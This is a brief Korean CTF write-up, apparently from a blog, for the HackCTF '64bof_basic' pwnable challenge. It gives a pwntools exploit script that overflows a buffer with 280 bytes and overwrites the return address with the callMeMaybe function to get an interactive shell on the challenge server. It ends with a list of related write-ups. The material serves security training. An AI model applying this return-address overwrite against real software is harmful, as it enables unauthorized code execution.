간단하게 ret 위치에 callMeMaybe 를 쓰면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3004)
e = ELF('./64bof_basic')
payload = 'A'*280
payload += p64(e.sym['callMeMaybe'])
r.sendline(payload)
r.interactive()'HackCTF > pwnable' 카테고리의 다른 글
| HackCTF - Simple_Overflow_ver_2 (0) | 2021.11.21 |
|---|---|
| HackCTF - x64 Simple_size_BOF (0) | 2021.11.21 |
| HackCTF - 내 버퍼가 흘러넘친다!!! (0) | 2021.11.20 |
| HackCTF - Basic_FSB (0) | 2021.11.20 |
| HackCTF - Basic_BOF #2 (0) | 2021.11.20 |
